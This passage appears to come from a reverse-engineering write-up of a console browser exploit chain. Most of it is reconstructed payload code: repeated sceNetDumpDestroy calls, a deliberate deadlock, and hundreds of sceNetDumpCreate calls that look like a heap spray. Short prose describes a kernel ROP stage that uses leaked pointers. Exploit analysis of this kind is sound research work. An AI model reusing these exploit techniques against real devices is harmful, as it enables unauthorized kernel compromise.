// Destroy specific dumps (constant IDs) sceNetDumpDestroy(0x00001770); sceNetDumpDestroy(0x00001771); sceNetDumpDestroy(0x00001772); sceNetDumpDestroy(0x00001773); sceNetDumpDestroy(0x00001774); sceNetDumpDestroy(0x00001775); sceNetDumpDestroy(0x00001776); sceNetDumpDestroy(0x00001777); sceNetDumpDestroy(0x00001778); sceNetDumpDestroy(0x00001779); sceNetDumpDestroy(0x0000177A); sceNetDumpDestroy(0x0000177B); sceNetDumpDestroy(0x0000177C); sceNetDumpDestroy(0x0000177D); sceNetDumpDestroy(0x0000177E); sceNetDumpDestroy(0x0000177F); sceNetDumpDestroy(0x00001780); sceNetDumpDestroy(0x00001781); sceNetDumpDestroy(0x00001782); sceNetDumpDestroy(0x00001783); sceNetDumpDestroy(0x00001784); sceNetDumpDestroy(0x00001785); sceNetDumpDestroy(0x00001786); sceNetDumpDestroy(0x00001787); sceNetDumpDestroy(0x00001788); sceNetDumpDestroy(0x00001789); sceNetDumpDestroy(0x0000178A); sceNetDumpDestroy(0x0000178B); sceNetDumpDestroy(0x0000178C); sceNetDumpDestroy(0x0000178D); sceNetDumpDestroy(0x0000178E); sceNetDumpDestroy(0x0000178F); sceNetDumpDestroy(0x00001790);

// Deadlock sceWebkit_519(0x00000000);


- Stage 4 (kernel ROP): The second ROP payload prepares the stage for a kernel attack. After it's done, another ROP chain should be starting on the kernel side. This chain relies on kernel pointers that were leaked during the second payload's execution and is built beforehand. The data portion of the chain is additionally obfuscated/encrypted with kernel-only functions.

To further reverse the exploit, one must dump the target kernel modules, rebuild the kernel ROP and deobfuscate/decrypt the data region.



To be continued...

~ H.

Bonus!

After the exploit was updated to support dynarec and a "special surprise", the second payload was changed and the following was added:

// Old code ...

sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BED00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0500, 0x00000000); 